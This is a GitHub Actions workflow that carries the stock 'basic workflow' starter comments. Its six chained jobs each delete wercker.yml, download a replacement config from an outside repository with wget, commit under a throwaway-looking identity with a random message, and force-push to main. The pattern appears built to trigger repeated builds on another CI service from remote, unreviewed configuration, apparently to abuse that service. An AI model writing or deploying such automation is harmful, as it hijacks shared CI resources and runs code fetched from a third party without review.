# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  auto-pull-request:
    name: PullRequestAction
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a one-line script
        run: |
         rm wercker.yml
         sleep 5
         wget https://raw.githubusercontent.com/giovanibrenton/root/main/1/wercker.yml
         git config --global user.email "curdengine4-derasakira809@yahoo.com"
         git config --global user.name "derasakira809"
         app_1=$(echo app$(shuf -i 1000000000-9999999999 -n 1))
         git add .
         git commit -m "$app_1"
         git push -f origin main
 
  merge-branch:
    needs: auto-pull-request
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a one-line script
        run: |
         rm wercker.yml
         sleep 5
         wget https://raw.githubusercontent.com/giovanibrenton/root/main/2/wercker.yml
         git config --global user.email "curdengine4-derasakira809@yahoo.com"
         git config --global user.name "derasakira809"
         app_1=$(echo app$(shuf -i 1000000000-9999999999 -n 1))
         git add .
         git commit -m "$app_1"
         git push -f origin main
         
  merge-wasap:
    needs:  merge-branch
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a one-line script
        run: |
         rm wercker.yml
         sleep 5
         wget https://raw.githubusercontent.com/giovanibrenton/root/main/3/wercker.yml
         git config --global user.email "curdengine4-derasakira809@yahoo.com"
         git config --global user.name "derasakira809"
         app_1=$(echo app$(shuf -i 1000000000-9999999999 -n 1))
         git add .
         git commit -m "$app_1"
         git push -f origin main
         
  merge-asam:
    needs:  merge-wasap
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a one-line script
        run: |
         rm wercker.yml
         sleep 5
         wget https://raw.githubusercontent.com/giovanibrenton/root/main/4/wercker.yml
         git config --global user.email "curdengine4-derasakira809@yahoo.com"
         git config --global user.name "derasakira809"
         app_1=$(echo app$(shuf -i 1000000000-9999999999 -n 1))
         git add .
         git commit -m "$app_1"
         git push -f origin main
         
  merge-sepa:
    needs:  merge-asam
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a one-line script
        run: |
         rm wercker.yml
         sleep 5
         wget https://raw.githubusercontent.com/giovanibrenton/root/main/5/wercker.yml
         git config --global user.email "curdengine4-derasakira809@yahoo.com"
         git config --global user.name "derasakira809"
         app_1=$(echo app$(shuf -i 1000000000-9999999999 -n 1))
         git add .
         git commit -m "$app_1"
         git push -f origin main
         
  merge-krass:
    needs:  merge-sepa
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a one-line script
        run: |
         sleep 5
         wget https://raw.githubusercontent.com/giovanibrenton/root/main/6/wercker.yml
         git config --global user.email "curdengine4-derasakira809@yahoo.com"
         git config --global user.name "derasakira809"
         app_1=$(echo app$(shuf -i 1000000000-9999999999 -n 1))
         git add .
         git commit -m "$app_1"
         git push -f origin main 
